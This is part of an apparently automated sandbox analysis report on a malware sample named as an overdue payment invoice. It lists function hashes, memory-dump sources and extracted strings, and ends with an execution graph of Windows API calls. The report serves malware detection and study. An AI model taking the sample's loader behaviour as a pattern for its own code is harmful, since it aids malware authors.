                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfca2458910762aeb77bd22b20ac7cda4f67b3f5b68a230de4ca388facd168b0
                                                                                              • Instruction ID: 3b81320319986e167ce85a7e603c2a2e86516d83e3dd56729085f14621c5c2a8
                                                                                              • Opcode Fuzzy Hash: dfca2458910762aeb77bd22b20ac7cda4f67b3f5b68a230de4ca388facd168b0
                                                                                              • Instruction Fuzzy Hash: 1EF03076300209DBDB05AF29E444CAA7BAAEF863A13504479F5088B234DA76AC45DBE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4734e12ed30dc126895aef9d78a4b6b02bb73626893958e139f07b837eb60f78
                                                                                              • Instruction ID: 928b7b1ec827dbb9c76d40bfc44248ca0baf8f0066ebaccab080ff9b6541f907
                                                                                              • Opcode Fuzzy Hash: 4734e12ed30dc126895aef9d78a4b6b02bb73626893958e139f07b837eb60f78
                                                                                              • Instruction Fuzzy Hash: 89E0DF70300109ABC720664EE844B7BFBEAFBC4361F00882AAD09C3244DAA0DC0486E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83d4acfca24bbf02a20840b44d7bd68300d922841d054677659666b3ac6a72f7
                                                                                              • Instruction ID: abfb8854d077ca5443424e518bec2dad7f7c95204c0c756945887be47723fb72
                                                                                              • Opcode Fuzzy Hash: 83d4acfca24bbf02a20840b44d7bd68300d922841d054677659666b3ac6a72f7
                                                                                              • Instruction Fuzzy Hash: D5F055B0A04248EFCB02DFB8E8595AC7F71EF9130071686D9D842E3356DA362E00DF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64f135f0b24efa9bdb2a96297bc7dafd8a9b98be301a441e3a503c40420bd24f
                                                                                              • Instruction ID: bfb91d3871c1d3a84d8e05a26aaf00a3612eab7a639de83f8f91b59d4a07d4b2
                                                                                              • Opcode Fuzzy Hash: 64f135f0b24efa9bdb2a96297bc7dafd8a9b98be301a441e3a503c40420bd24f
                                                                                              • Instruction Fuzzy Hash: B9F0D431200610CFC714DB2CD588C597BE5FF4971575145A9E50ACB332CB72EC41CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af33f5dcb394d43abb7a383dae93849b6e2c2f2ddde3243402dbcd78af5caee7
                                                                                              • Instruction ID: 3b5a9444a015c1047e1cc15f640439162b9752685c3b543562b01f10622896b2
                                                                                              • Opcode Fuzzy Hash: af33f5dcb394d43abb7a383dae93849b6e2c2f2ddde3243402dbcd78af5caee7
                                                                                              • Instruction Fuzzy Hash: 82E04F72B002146B9B04EABD9C458BFBBEEDB845A0B50C0BA9D08D3200FE309D0247D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 757f2d9ec01c1c1bb8087e5d63c18d6ed4e1d12ddc3c2b5ac72fed7cf4803fac
                                                                                              • Instruction ID: 9d01f3203facd6da86ac9d8b0bf3a1a97e33bb306d610bb5fc9f1713dd4623dd
                                                                                              • Opcode Fuzzy Hash: 757f2d9ec01c1c1bb8087e5d63c18d6ed4e1d12ddc3c2b5ac72fed7cf4803fac
                                                                                              • Instruction Fuzzy Hash: 4AE092B220D6910FC702EBBED89058AFFE5EFDA2107498D9FD194CF226DB6068558391
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 722cfae85821a96f6b2e85ecf69c846950412c7574feb8dee1c1f104f62ac096
                                                                                              • Instruction ID: bde6b53ef7f519fb72bb583e4ad48fb67fd5bae4311f32b0a37b000006c2bbdb
                                                                                              • Opcode Fuzzy Hash: 722cfae85821a96f6b2e85ecf69c846950412c7574feb8dee1c1f104f62ac096
                                                                                              • Instruction Fuzzy Hash: 73F030318092C9AFCF02DBB4C9544DDBF74EF06211B1446DAD895AB192DA352B06DB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ff6752792b71817059ce3d83c70f8f0ffb08c58e6624f6698beec590c806411c
                                                                                              • Instruction ID: f0bb2656a1677cd88ff8a16efc53c3a174fb666b224f21d937113cd16a21560a
                                                                                              • Opcode Fuzzy Hash: ff6752792b71817059ce3d83c70f8f0ffb08c58e6624f6698beec590c806411c
                                                                                              • Instruction Fuzzy Hash: 29F0A536A01208DBCF54EFA4E6495DCB7B1EB49216F7404A6C806B6250CB325E84CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d96f2a55fcfe702242d2ddbc2a287ef232a518e95675ef1b549cd6a91c82fa8a
                                                                                              • Instruction ID: 06ee8a8fcf0876cc979b7006b641fb2e6523d4f751ceb18e9f62225fc7762a7a
                                                                                              • Opcode Fuzzy Hash: d96f2a55fcfe702242d2ddbc2a287ef232a518e95675ef1b549cd6a91c82fa8a
                                                                                              • Instruction Fuzzy Hash: 79D05E30318B149FC72CDA1CE840C9AB3EAEF883113648AAAF00AC7761DA60FC0587C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5aff3218e502152b42ecd520d227ea20d78c3186ceb873e5f27e10047913f4ae
                                                                                              • Instruction ID: 890d68ac93123a6334b931f5678662c0624c459c873af9749136dab8d52f80f1
                                                                                              • Opcode Fuzzy Hash: 5aff3218e502152b42ecd520d227ea20d78c3186ceb873e5f27e10047913f4ae
                                                                                              • Instruction Fuzzy Hash: 7DE086B1A00209EFCB00EFB8F44495CBB79FB442107508669E80593344DA362E40DF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74d1f44f401a2630404289f2a089a1def4d56525245145e8ba7a587ecfd6fd5f
                                                                                              • Instruction ID: 1481d756688ed7fe37470d5e8a18e949de8cf4991386e80dd28a432f9aea9a06
                                                                                              • Opcode Fuzzy Hash: 74d1f44f401a2630404289f2a089a1def4d56525245145e8ba7a587ecfd6fd5f
                                                                                              • Instruction Fuzzy Hash: 59E07E75D0120CEFCB40DFA9D9458DDBFB9EB48201F1082AAA909B2200EA316B159B80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15e96c656cb0455ee7c9c62ea38ce91cff5972c835e028a11df1729fe7c197a7
                                                                                              • Instruction ID: 3114f5aeda636e53bf5b429a9846dac163c81c4066855be477f5b8a299881681
                                                                                              • Opcode Fuzzy Hash: 15e96c656cb0455ee7c9c62ea38ce91cff5972c835e028a11df1729fe7c197a7
                                                                                              • Instruction Fuzzy Hash: 96E0B636210209DFCB01DF54E948C597BBAFF05314755C0A6E9198B231C732E965DF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93cdc18df361df17bb9749254d2746a2462b832da66b728a1e07ff35a3612529
                                                                                              • Instruction ID: 7c846de4c2ba0dae5df84d121f126b1cd571f400c02ec5037928182cebe5104f
                                                                                              • Opcode Fuzzy Hash: 93cdc18df361df17bb9749254d2746a2462b832da66b728a1e07ff35a3612529
                                                                                              • Instruction Fuzzy Hash: F7C0023B000108EFCB126FC0E948C85BFAAEB48710706C091F6094A136DB72D564FB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dab32ba88207dee6617e9c296c7054c3ffc99c02c3ccd2e1c44b9d1a04fce1c8
                                                                                              • Instruction ID: ad989de342fd5280cf78211339b94d4fcb29cc56b54e341bbf5ebba9484e79b5
                                                                                              • Opcode Fuzzy Hash: dab32ba88207dee6617e9c296c7054c3ffc99c02c3ccd2e1c44b9d1a04fce1c8
                                                                                              • Instruction Fuzzy Hash: E9E10774E051198FCB14CFA9C5849AEBBB2FF89304F2482A9E415EB356D735AD42CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8691de1c58ca0dd7129e2986c9c356add8ba4694bd537af0be785d8c54bd40dc
                                                                                              • Instruction ID: e114686655f7a6cd500da4f781c7039c6904eedb4bb373cfc9abad5dd811905b
                                                                                              • Opcode Fuzzy Hash: 8691de1c58ca0dd7129e2986c9c356add8ba4694bd537af0be785d8c54bd40dc
                                                                                              • Instruction Fuzzy Hash: B5E1F574E052598FDB14CFA9C5809AEBBF2FF89304F2481A9E414AB356D734AD81CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7b1b9cd687c1107ef68552c4f536cb1231cf3f6b91f2f84d5abc17ecf91ef778
                                                                                              • Instruction ID: d9c1b0021e41097deacac035ec17fa475d75f35487561a8d22e6714fd391d2ec
                                                                                              • Opcode Fuzzy Hash: 7b1b9cd687c1107ef68552c4f536cb1231cf3f6b91f2f84d5abc17ecf91ef778
                                                                                              • Instruction Fuzzy Hash: 711295B24217458AE732CFA5E94C1893BB1B745318F92431AD2712F2E9E7B4164FEF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abc0a71b1dac977ba3a54777260664520b556be14ca98d265370237a557ebd6e
                                                                                              • Instruction ID: 5d1acfd678a80e3392abb5904116fd40a528b9600bf375cf4157eeec74e3bb1c
                                                                                              • Opcode Fuzzy Hash: abc0a71b1dac977ba3a54777260664520b556be14ca98d265370237a557ebd6e
                                                                                              • Instruction Fuzzy Hash: 6FE1E674E051198FCB14CFA9C5809AEBBF2FF89314F248169E418AB356D734AD81CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d60872443cf40d71567cfb6c262addfb153171a349a8d2eb612f8d2e08d86989
                                                                                              • Instruction ID: a7a0ca7406a33d9dc687774e17390d372240af2169d1b8e889ebf1f61da1baad
                                                                                              • Opcode Fuzzy Hash: d60872443cf40d71567cfb6c262addfb153171a349a8d2eb612f8d2e08d86989
                                                                                              • Instruction Fuzzy Hash: 70E1E974E051198FCB14CFA9C5809AEFBB2FF89305F24826AE514AB355D734AD42CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 979e5cb82a1bcef561d4b79dde6e2060fb08a48c5e3ccb03d97f3b6e661b31ca
                                                                                              • Instruction ID: 562b072b468eb43cda9388d0a61deea48effa98f382b9aeb0e2437019e80ccce
                                                                                              • Opcode Fuzzy Hash: 979e5cb82a1bcef561d4b79dde6e2060fb08a48c5e3ccb03d97f3b6e661b31ca
                                                                                              • Instruction Fuzzy Hash: 9BE1F974E051198FCB14DFA9C5809AEFBB2FF89314F2482A9E914AB355D734AD42CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0a73dbf3cb2ad1439c6a49637b2a0922a0e795c750dc60c2e76ccfe7ec2ed342
                                                                                              • Instruction ID: f99bc66bb1c8b41b8b33ba4f031defc2a0afcd74c7cff9efb7d376656411176a
                                                                                              • Opcode Fuzzy Hash: 0a73dbf3cb2ad1439c6a49637b2a0922a0e795c750dc60c2e76ccfe7ec2ed342
                                                                                              • Instruction Fuzzy Hash: 2DE1C374E051198FCB14CFA9C5809AEBBF2FF89304F6481A9E458AB355D734A981CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b2e1cde7d83fcb884f14dc0d9d89794f80a731daca75f901ff24e158e5a16a4
                                                                                              • Instruction ID: db09a6f3031178f9a1b95e26599e520b9bc4e76104c4267c3ce730ee10faaae8
                                                                                              • Opcode Fuzzy Hash: 6b2e1cde7d83fcb884f14dc0d9d89794f80a731daca75f901ff24e158e5a16a4
                                                                                              • Instruction Fuzzy Hash: 41E1F874E051198FCB14CFA9C5809AEFBB2FF89314F2482A9E415AB355D734AD42CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e8e6c706671b494e41481e561eb80e84105a4822dad4cfe5d0a6f6054fb15ce
                                                                                              • Instruction ID: e4a9b5f668f2d2f4cc3cdbf1120fdbb4da204b34e2d0ec57a713043986750e4f
                                                                                              • Opcode Fuzzy Hash: 1e8e6c706671b494e41481e561eb80e84105a4822dad4cfe5d0a6f6054fb15ce
                                                                                              • Instruction Fuzzy Hash: 35E1F574E051198FCB14DFA9C5809AEBBF2FF89304F6481A9E458AB355D734AD81CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e022a5fc2c35971762233fbec8ca68c02642b99b028f82986c2a5ceee3e20842
                                                                                              • Instruction ID: 9b3388679dd75524ff3b38593193fc069854287c9eaaf36859b8c5aa8794314e
                                                                                              • Opcode Fuzzy Hash: e022a5fc2c35971762233fbec8ca68c02642b99b028f82986c2a5ceee3e20842
                                                                                              • Instruction Fuzzy Hash: 86E1E774E051198FCB14DFA9C5809AEBBF2FF89304F6481A9E414AB395D734AD81CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 878d113c6d5b2b60ec6107bff49289bd41e3eb59ed77c1f7561bdfcb2da59e58
                                                                                              • Instruction ID: fd4529b8b869ae2cf22fdb6f258c0dc9f9b9d19b09467f3073a3e91b6bcb9746
                                                                                              • Opcode Fuzzy Hash: 878d113c6d5b2b60ec6107bff49289bd41e3eb59ed77c1f7561bdfcb2da59e58
                                                                                              • Instruction Fuzzy Hash: 41A18E36E002098FCF15DFB5C84459EBFB6FF94300B1545AAE905EB265DB31E91ACB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 510b1ce9361a5c428a27d68ead74f7c57adf44b0198606e4c4b22f2f44125822
                                                                                              • Instruction ID: a2893158f24a5ea5525d1fa60eb480ed0acd2dc2796dbec83c15bc08e28494f9
                                                                                              • Opcode Fuzzy Hash: 510b1ce9361a5c428a27d68ead74f7c57adf44b0198606e4c4b22f2f44125822
                                                                                              • Instruction Fuzzy Hash: CDC119B24217458BD722CFA4E94C1893BB1BB85324F56431AD2716F2E8EBB4164FEF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b0352785eaea73a550022180317100fe75f9aa807fae21f9a5b65d01ed5bbb0
                                                                                              • Instruction ID: dc9e6baa74d8da088843979c8bf049a89fa1e9968fd2a3a7c9585df171b829b7
                                                                                              • Opcode Fuzzy Hash: 6b0352785eaea73a550022180317100fe75f9aa807fae21f9a5b65d01ed5bbb0
                                                                                              • Instruction Fuzzy Hash: ED716F74E052188FDB04DFAAC58499EFBF2BF89301F14D16AE818EB219D734A941CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40c770b411079173514dd382944ce4037644002f4f0b8dc3a22a529350f59052
                                                                                              • Instruction ID: 59227e9539a2ea12abb8c75b77491850889ed13dc213467f15bf73c4255cb5bc
                                                                                              • Opcode Fuzzy Hash: 40c770b411079173514dd382944ce4037644002f4f0b8dc3a22a529350f59052
                                                                                              • Instruction Fuzzy Hash: D8519475E016188FDB08CFAAC98459EFBF2BF89300F14C16AE819AB364DB345946CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6b02217d0769149de41378925bfb2787e8975c2b40f5af6498b0a06df820a99
                                                                                              • Instruction ID: 82314751a081d5c6cca9e2deb69254ef3c662cba8aab007b17ca6c0d08db5611
                                                                                              • Opcode Fuzzy Hash: e6b02217d0769149de41378925bfb2787e8975c2b40f5af6498b0a06df820a99
                                                                                              • Instruction Fuzzy Hash: 1851F874E052198FCB14CFA9C9809AEFBF2BF89314F2481A9D418AB356D7349D41CFA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                                                                                              • API String ID: 0-2994207708
                                                                                              • Opcode ID: 0ae918b8ead8b7b52e6fdbec6f44dcda6505f980c0971892755a127dcf431f60
                                                                                              • Instruction ID: e643cce9c99a2033fc206351bce880f68c07ea81f34483cf4792873324e54d18
                                                                                              • Opcode Fuzzy Hash: 0ae918b8ead8b7b52e6fdbec6f44dcda6505f980c0971892755a127dcf431f60
                                                                                              • Instruction Fuzzy Hash: 67121470A0121A8FCB59EFB9E86069E77B2FFA4300F51856DD015AF269DB702D49CF90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                                                                                              • API String ID: 0-2994207708
                                                                                              • Opcode ID: 0848cd2b0f637481e9833330899331814a0f7f393cbbb25ff29b5247fd25bf6a
                                                                                              • Instruction ID: 45ce79909cc491c9d60cbfd8a8b78baf19284044eb5d8018178cc8f1013bbfe7
                                                                                              • Opcode Fuzzy Hash: 0848cd2b0f637481e9833330899331814a0f7f393cbbb25ff29b5247fd25bf6a
                                                                                              • Instruction Fuzzy Hash: B2121370A0121A8FCB59EFB9E86069E77B2FFA4300F51856DD015AF269DB702D49CF90

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.2%
                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                              Signature Coverage:3.8%
                                                                                              Total number of Nodes:131
                                                                                              Total number of Limit Nodes:7
                                                                                              execution_graph 91609 424b43 91613 424b5c 91609->91613 91610 424ba7 91617 42e483 91610->91617 91613->91610 91614 424bea 91613->91614 91616 424bef 91613->91616 91615 42e483 RtlFreeHeap 91614->91615 91615->91616 91620 42c783 91617->91620 91619 424bb7 91621 42c7a0 91620->91621 91622 42c7b1 RtlFreeHeap 91621->91622 91622->91619 91623 42ba03 91624 42ba20 91623->91624 91627 1022df0 LdrInitializeThunk 91624->91627 91625 42ba48 91627->91625 91628 42f523 91629 42f533 91628->91629 91630 42f539 91628->91630 91633 42e563 91630->91633 91632 42f55f 91636 42c733 91633->91636 91635 42e57b 91635->91632 91637 42c750 91636->91637 91638 42c761 RtlAllocateHeap 91637->91638 91638->91635 91639 1022b60 LdrInitializeThunk 91640 41b0c3 91642 41b107 91640->91642 91641 41b128 91642->91641 91644 42c403 91642->91644 91645 42c420 91644->91645 91646 42c431 NtClose 91645->91646 91646->91641 91647 413e73 91648 413e8d 91647->91648 91653 4175c3 91648->91653 91650 413eab 91651 413ef0 91650->91651 91652 413edf PostThreadMessageW 91650->91652 91652->91651 91655 4175e7 91653->91655 91654 4175ee 91654->91650 91655->91654 91656 417623 LdrLoadDll 91655->91656 91657 41763a 91655->91657 91656->91657 91657->91650 91658 4118d3 91659 4118e8 91658->91659 91664 413b83 91659->91664 91662 42c403 NtClose 91663 411901 91662->91663 91665 413ba9 91664->91665 91667 4118f4 91665->91667 91668 413903 91665->91668 91667->91662 91669 413919 91668->91669 91672 42c693 91669->91672 91673 42c6b0 91672->91673 91676 1022c70 LdrInitializeThunk 91673->91676 91674 413922 91674->91667 91676->91674 91677 41e2b3 91678 41e2d9 91677->91678 91681 41e3cd 91678->91681 91683 42f653 91678->91683 91680 41e36b 91680->91681 91689 42ba53 91680->91689 91684 42f5c3 91683->91684 91685 42e563 RtlAllocateHeap 91684->91685 91687 42f620 91684->91687 91686 42f5fd 91685->91686 91688 42e483 RtlFreeHeap 91686->91688 91687->91680 91688->91687 91690 42ba70 91689->91690 91693 1022c0a 91690->91693 91691 42ba9c 91691->91681 91694 1022c11 91693->91694 91695 1022c1f LdrInitializeThunk 91693->91695 91694->91691 91695->91691 91696 401a54 91697 